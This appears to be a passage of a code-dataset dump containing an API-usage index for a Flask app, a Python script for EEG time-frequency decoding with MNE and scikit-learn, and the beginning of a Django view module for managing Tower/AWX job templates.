"name"}, {"api_name": "os.path.join", "line_number": 875, "usage_type": "call"}, {"api_name": "os.path", "line_number": 875, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 878, "usage_type": "call"}, {"api_name": "os.path", "line_number": 878, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 882, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 897, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 897, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 907, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 907, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 907, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 909, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 909, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 909, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 922, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 922, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 922, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 943, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 943, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 954, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 954, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 954, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 956, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 956, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 956, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 959, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 959, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 960, "usage_type": "name"}, {"api_name": "Config.list_news_storagemanage_class", "line_number": 962, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 813, "usage_type": "name"}, {"api_name": "Model.Department.query.filter_by", "line_number": 984, "usage_type": "call"}, {"api_name": "Model.Department.query", "line_number": 984, "usage_type": "attribute"}, {"api_name": "Model.Department", "line_number": 984, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 984, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 987, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 987, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 987, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 988, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 988, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 988, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 989, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 989, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 989, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 990, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 990, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 990, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 998, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 998, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 1001, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 1001, "usage_type": "name"}, {"api_name": "Model.NewsFile.query.filter_by", "line_number": 1016, "usage_type": "call"}, {"api_name": "Model.NewsFile.query", "line_number": 1016, "usage_type": "attribute"}, {"api_name": "Model.NewsFile", "line_number": 1016, "usage_type": "name"}, {"api_name": "Model.NewsFile.query.filter_by", "line_number": 1019, "usage_type": "call"}, {"api_name": "Model.NewsFile.query", "line_number": 1019, "usage_type": "attribute"}, {"api_name": "Model.NewsFile", "line_number": 1019, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 1022, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1022, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 1025, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1025, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 1028, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 1031, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1031, "usage_type": "attribute"}, {"api_name": "Model.NewsFile.query.filter_by", "line_number": 1040, "usage_type": "call"}, {"api_name": "Model.NewsFile.query", "line_number": 1040, "usage_type": "attribute"}, {"api_name": "Model.NewsFile", "line_number": 1040, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 1054, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 1054, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 1054, "usage_type": "name"}, {"api_name": "flask.request.files.getlist", "line_number": 1062, "usage_type": "call"}, {"api_name": "flask.request.files", "line_number": 1062, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 1062, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 1072, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1072, "usage_type": "attribute"}, {"api_name": "werkzeug.utils.secure_filename", "line_number": 1084, "usage_type": "call"}, {"api_name": "Model.NewsFile.query.filter_by", "line_number": 1087, "usage_type": "call"}, {"api_name": "Model.NewsFile.query", "line_number": 1087, "usage_type": "attribute"}, {"api_name": "Model.NewsFile", "line_number": 1087, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 1112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1112, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 1116, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 1124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1124, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1124, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 1128, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1128, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1128, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1132, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1132, "usage_type": "attribute"}, {"api_name": "werkzeug.utils.secure_filename", "line_number": 1143, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1145, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1145, "usage_type": "attribute"}, {"api_name": "Model.NewsFile", "line_number": 1152, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1152, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1152, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 1159, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 1159, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 1159, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 1165, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 1165, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 1165, "usage_type": "name"}, {"api_name": "Model.NewsFile.query.filter_by", "line_number": 1168, "usage_type": "call"}, {"api_name": "Model.NewsFile.query", "line_number": 1168, "usage_type": "attribute"}, {"api_name": "Model.NewsFile", "line_number": 1168, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 1177, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1177, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1177, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 1185, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1190, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1190, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 1192, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 1192, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 1198, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 1198, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 1198, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 1199, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 1199, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 968, "usage_type": "name"}, {"api_name": "Model.Department.query.filter_by", "line_number": 1221, "usage_type": "call"}, {"api_name": "Model.Department.query", "line_number": 1221, "usage_type": "attribute"}, {"api_name": "Model.Department", "line_number": 1221, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 1221, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 1224, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 1224, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 1224, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 1225, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 1225, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 1225, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 1227, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 1227, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 1227, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 1230, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 1230, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 1233, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 1233, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 1256, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 1256, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 1256, "usage_type": "name"}, {"api_name": "Model.NewsFile.query.filter_by", "line_number": 1270, "usage_type": "call"}, {"api_name": "Model.NewsFile.query", "line_number": 1270, "usage_type": "attribute"}, {"api_name": "Model.NewsFile", "line_number": 1270, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 1273, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1273, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 1276, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1276, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 1280, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 1288, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1288, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1288, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 1292, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1292, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1292, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1296, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1296, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1309, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1309, "usage_type": "attribute"}, {"api_name": "shutil.move", "line_number": 1315, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1315, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1315, "usage_type": "attribute"}, {"api_name": "Model.News.query.filter_by", "line_number": 1324, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 1324, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 1324, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 1345, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 1345, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 1345, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 1348, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 1348, "usage_type": "name"}, {"api_name": "Config.list_editnews_class", "line_number": 1351, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 1352, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 1352, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 1205, "usage_type": "name"}, {"api_name": "Model.Department.query.filter_by", "line_number": 1375, "usage_type": "call"}, {"api_name": "Model.Department.query", "line_number": 1375, "usage_type": "attribute"}, {"api_name": "Model.Department", "line_number": 1375, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 1375, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 1379, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 1379, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 1383, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 1383, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 1383, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 1384, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 1384, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 1384, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 1387, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 1387, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 1387, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 1388, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 1388, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 1388, "usage_type": "name"}, {"api_name": "flask.request.files.getlist", "line_number": 1396, "usage_type": "call"}, {"api_name": "flask.request.files", "line_number": 1396, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 1396, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 1413, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 1413, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 1413, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 1414, "usage_type": "name"}, {"api_name": "Model.News", "line_number": 1421, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 1421, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 1431, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 1431, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 1431, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 1431, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 1439, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1439, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 1442, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1442, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 1446, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 1454, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1454, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1454, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 1458, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1458, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1458, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1462, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1462, "usage_type": "attribute"}, {"api_name": "werkzeug.utils.secure_filename", "line_number": 1468, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1470, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1470, "usage_type": "attribute"}, {"api_name": "Model.NewsFile", "line_number": 1477, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1477, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1477, "usage_type": "attribute"}, {"api_name": "flask.redirect", "line_number": 1487, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 1489, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 1489, "usage_type": "name"}, {"api_name": "Config.list_addnews_class", "line_number": 1491, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 1359, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 1502, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 1502, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 1505, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 1505, "usage_type": "name"}, {"api_name": "Model.User.query.filter_by", "line_number": 1511, "usage_type": "call"}, {"api_name": "Model.User.query", "line_number": 1511, "usage_type": "attribute"}, {"api_name": "Model.User", "line_number": 1511, "usage_type": "name"}, {"api_name": "Model.User.query.filter_by", "line_number": 1526, "usage_type": "call"}, {"api_name": "Model.User.query", "line_number": 1526, "usage_type": "attribute"}, {"api_name": "Model.User", "line_number": 1526, "usage_type": "name"}, {"api_name": "flask_login.login_user", "line_number": 1534, "usage_type": "call"}, {"api_name": "Model.Department.query.filter_by", "line_number": 1537, "usage_type": "call"}, {"api_name": "Model.Department.query", "line_number": 1537, "usage_type": "attribute"}, {"api_name": "Model.Department", "line_number": 1537, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 1539, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 1540, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 1541, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 1542, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 1545, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 1549, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 1549, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 1549, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 1558, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 1566, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 1570, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 1578, "usage_type": "name"}, {"api_name": "flask_login.logout_user", "line_number": 1580, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 1584, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 1584, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 1575, "usage_type": "name"}, {"api_name": "flask.g.user", "line_number": 1589, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 1589, "usage_type": "name"}, {"api_name": "flask_login.current_user", "line_number": 1589, "usage_type": "name"}, {"api_name": "Model.User.query.filter_by", "line_number": 1594, "usage_type": "call"}, {"api_name": "Model.User.query", "line_number": 1594, "usage_type": "attribute"}, {"api_name": "Model.User", "line_number": 1594, "usage_type": "name"}]} +{"seq_id": "414433555", "text": "# Author: Nicolas Legrand (legrand@cyceron.fr)\n\n\nimport matplotlib.pyplot as plt\nimport mne\nimport numpy as np\nimport pandas as pd\nfrom mne.decoding import SlidingEstimator, cross_val_multiscore\nfrom mne.time_frequency import tfr_morlet\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler\n\ntask = \"Attention\"\nroot = \"D:/EEG_wd/Machine_learning/\"\ndata_path = \"D:/ENGRAMME/GROUPE_2/EEG/\"\n\n# Subjects ID\nnames = [\n \"31NLI\",\n \"32CVI\",\n \"34LME\",\n \"35QSY\",\n \"36LSA\",\n \"37BMA\",\n \"38MAX\",\n \"39BDA\",\n \"40MMA\",\n \"41BAL\",\n \"42SPE\",\n \"44SMU\",\n \"45MJA\",\n \"46SQU\",\n \"47HMA\",\n \"50JOC\",\n \"52PFA\",\n \"53SMA\",\n \"55MNI\",\n \"56BCL\",\n \"57NCO\",\n \"58BAN\",\n \"59DIN\",\n \"60CAN\",\n]\n\nclassifier = RandomForestClassifier(\n class_weight=\"balanced\", n_estimators=50, random_state=42\n)\n\n\n# =============================================================================\n# %%\n# =============================================================================\ndef data_attention(subject: str, eeg: bool = True):\n\n # Load e-prime file\n eprime_df = data_path + subject + \"/\" + subject + \"_a.txt\"\n eprime = pd.read_csv(eprime_df, skiprows=1, sep=\"\\t\")\n eprime = eprime[\n [\n \"Cond1\",\n \"Cond2\",\n \"Cond3\",\n \"Cond4\",\n \"Image.OnsetTime\",\n \"Image.RESP\",\n \"Image.RT\",\n \"ImageCentre\",\n \"ImageFond\",\n \"ListImage.Cycle\",\n ]\n ]\n eprime[\"ListImage.Cycle\"] = eprime[\"ListImage.Cycle\"] - 1\n epochs = None\n\n if eeg:\n\n # Load epoch from autoreject\n in_epoch = root + \"Attention/5_autoreject/\" + subject + \"-epo.fif\"\n epochs = mne.read_epochs(in_epoch, preload=True) # Epochs\n epochs.pick_types(\n emg=False, eeg=True, stim=False, eog=False, misc=False, exclude=\"bads\"\n )\n\n # Droped epochs\n eprime = eprime[[not i for i in epochs.drop_log]]\n eprime.reset_index(inplace=True, drop=True)\n\n # Aberrant values\n epochs.drop((eprime[\"Image.RT\"] < 400) | (eprime[\"Image.RT\"] > 3000))\n eprime = eprime[~((eprime[\"Image.RT\"] < 400) | (eprime[\"Image.RT\"] > 3000))]\n eprime.reset_index(inplace=True, drop=True)\n\n return epochs, eprime\n\n\n# =========================================\n# %% Decoding cross-frequencies - Attention\n# =========================================\n\n\ndef attention_TF_decoding(\n subject: str, freqs: np.ndarray = np.arange(3, 30, 1), decim: int = 20\n):\n\n # Import behavioral and EEG data.\n attention, attention_df = data_attention(subject)\n\n n_cycles = freqs / 2\n attention_tfr = tfr_morlet(\n attention,\n freqs,\n n_jobs=6,\n n_cycles=n_cycles,\n decim=decim,\n return_itc=False,\n average=False,\n )\n attention_tfr.crop(-0.5, 1.5)\n attention_tfr.apply_baseline(mode=\"percent\", baseline=(None, 0))\n\n labels = attention_df.Cond1[attention_df.Cond1 != \"Think\"] == \"No-Think\"\n\n # Run a sliding decoder for each frequency band\n scores_total = []\n for this_freq in range(len(freqs)):\n\n data = attention_tfr._data[attention_df.Cond1 != \"Think\", :, this_freq, :]\n\n # Classifier\n clf = make_pipeline(\n StandardScaler(),\n RandomForestClassifier(\n class_weight=\"balanced\", n_estimators=50, random_state=42\n ),\n )\n\n time_decod = SlidingEstimator(clf, n_jobs=1, scoring=\"roc_auc\")\n\n scores = cross_val_multiscore(time_decod, data, labels, cv=8, n_jobs=8)\n\n scores_total.append(np.asarray(scores).mean(0))\n\n return np.asarray(scores_total)\n\n\n# %% Run Time-frequency decoding\nif __name__ == \"__main__\":\n\n total = []\n for subject in names:\n subject_score = attention_TF_decoding(subject)\n total.append(subject_score)\n np.save(\n root + \"Results/Attention_TF_decoding/\" + subject + \".npy\", subject_score\n )\n\n plt.rcParams[\"figure.figsize\"] = [10.0, 5.0]\n plt.title(\"Frequency decoding - \" + subject, fontweight=\"bold\")\n plt.imshow(\n subject_score,\n origin=\"lower\",\n aspect=\"auto\",\n vmin=0.35,\n vmax=0.65,\n cmap=plt.cm.get_cmap(\"RdBu_r\", 20),\n interpolation=\"hanning\",\n extent=[-0.5, 1.5, 3, 30],\n )\n plt.axvline(x=0, color=\"k\", linewidth=3)\n plt.xlabel(\"Time (s)\")\n plt.ylabel(\"Frequencies\")\n plt.colorbar()\n plt.savefig(root + \"Results/Attention_TF_decoding/\" + subject + \".png\", dpi=300)\n plt.clf()\n plt.close()\n", "sub_path": "code/7_Attention_time_frequency_decoding.py", "file_name": "7_Attention_time_frequency_decoding.py", "file_ext": "py", "file_size_in_byte": 4747, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 58, "usage_type": "call"}, {"api_name": "mne.read_epochs", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 103, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 103, "usage_type": "call"}, {"api_name": "mne.time_frequency.tfr_morlet", "line_number": 110, "usage_type": "call"}, {"api_name": "sklearn.pipeline.make_pipeline", "line_number": 131, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 132, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 133, "usage_type": "call"}, {"api_name": "mne.decoding.SlidingEstimator", "line_number": 138, "usage_type": "call"}, {"api_name": "mne.decoding.cross_val_multiscore", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 158, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 158, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 160, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm.get_cmap", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 166, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 166, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 170, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 170, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 171, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 172, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 172, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 174, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 174, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 175, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 175, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 176, "usage_type": "name"}]} +{"seq_id": "618348140", "text": "from django.contrib.auth.decorators import permission_required\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.urls import reverse\nfrom django.utils.safestring import mark_safe\nfrom django_celery_results.models import TaskResult\n\nfrom service_catalog import tasks\nfrom service_catalog.forms import TowerServerForm\nfrom service_catalog.models import TowerServer, JobTemplate, Operation, OperationType\nfrom service_catalog.serializers import TaskResultSerializer\n\n\n@permission_required('service_catalog.add_towerserver')\ndef add_tower(request):\n if request.method == 'POST':\n form = TowerServerForm(request.POST)\n if form.is_valid():\n new_tower = form.save()\n new_tower.sync()\n return redirect('service_catalog:list_tower')\n else:\n form = TowerServerForm()\n breadcrumbs = [\n {'text': 'Tower/AWX', 'url': reverse('service_catalog:list_tower')},\n {'text': 'Create a new server', 'url': \"\"}\n ]\n context = {'form': form, 'breadcrumbs': breadcrumbs, 'action': 'create'}\n return render(request, 'service_catalog/admin/tower/tower-create.html', context)\n\n\n@permission_required('service_catalog.change_towerserver')\ndef sync_tower(request, tower_id, job_template_id=None):\n if request.method == 'POST':\n task = tasks.sync_tower.delay(tower_id, job_template_id)\n task_result = TaskResult(task_id=task.task_id)\n task_result.save()\n return JsonResponse({\"task_id\": task_result.id}, status=202)\n\n\n@permission_required('service_catalog.view_taskresult')\ndef get_task_result(request, task_id):\n task_result = TaskResult.objects.get(id=task_id)\n serialized_task = TaskResultSerializer(task_result)\n return JsonResponse(serialized_task.data, status=202)\n\n\n@permission_required('service_catalog.delete_towerserver')\ndef delete_tower(request, tower_id):\n tower_server = get_object_or_404(TowerServer, id=tower_id)\n if request.method == \"POST\":\n tower_server.delete()\n return redirect('service_catalog:list_tower')\n breadcrumbs = [\n {'text': 'Tower/AWX', 'url': reverse('service_catalog:list_tower')},\n {'text': tower_server.name, 'url': \"\"}\n ]\n context = {\n \"tower_server\": tower_server,\n 'breadcrumbs': breadcrumbs\n }\n return render(request, \"service_catalog/admin/tower/tower-delete.html\", context)\n\n\n@permission_required('service_catalog.delete_jobtemplate')\ndef delete_job_template(request, tower_id, job_template_id):\n tower_server = get_object_or_404(TowerServer, id=tower_id)\n job_template = get_object_or_404(JobTemplate, id=job_template_id)\n if request.method == 'POST':\n job_template.delete()\n return redirect('service_catalog:tower_job_templates_list', tower_id=tower_id)\n args = {\n \"tower_id\": tower_server.id,\n \"job_template_id\": job_template.id,\n }\n breadcrumbs = [\n {'text': 'Tower/AWX', 'url': reverse('service_catalog:list_tower')},\n {'text': tower_server.name, 'url': \"\"},\n {'text': 'Job templates', 'url': reverse('service_catalog:tower_job_templates_list', args=[tower_id])},\n {'text': job_template.name, 'url': \"\"},\n {'text': 'Delete', 'url': \"\"}\n ]\n warning_service_disabled = ' - This service will be disabled'\n operations = Operation.objects.filter(job_template=job_template)\n context = {\n 'breadcrumbs': breadcrumbs,\n 'confirm_text': mark_safe(f\"Confirm deletion of {job_template.name}?\"),\n 'action_url': reverse('service_catalog:delete_job_template', kwargs=args),\n 'button_text': 'Delete',\n 'details': {'warning_sentence': 'Warning: some services/operations are still using this job template:',\n 'details_list': [\n f\"Service: \\\"{operation.service.name}\\\" / Operation: \\\"{operation.name}\\\"{warning_service_disabled if operation.type == OperationType.CREATE else ''}.\"\n for operation in operations]\n } if operations else None\n }\n return render(request, 'generics/confirm-delete-template.html', context=context)\n\n\n@permission_required('service_catalog.view_jobtemplate')\ndef job_template_details(request, tower_id, job_template_id):\n tower_server = get_object_or_404(TowerServer, id=tower_id)\n job_template = get_object_or_404(JobTemplate, id=job_template_id)\n breadcrumbs = [\n {'text': 'Tower/AWX', 'url': reverse('service_catalog:list_tower')},\n {'text': tower_server.name, 'url': \"\"},\n {'text': 'Job templates', 'url': reverse('service_catalog:tower_job_templates_list', args=[tower_id])},\n {'text': job_template.name, 'url': \"\"},\n ]\n context = {\n \"job_template\": job_template,\n 'breadcrumbs': breadcrumbs\n }\n return render(request, \"service_catalog/admin/tower/job_templates/job-template-details.html\", 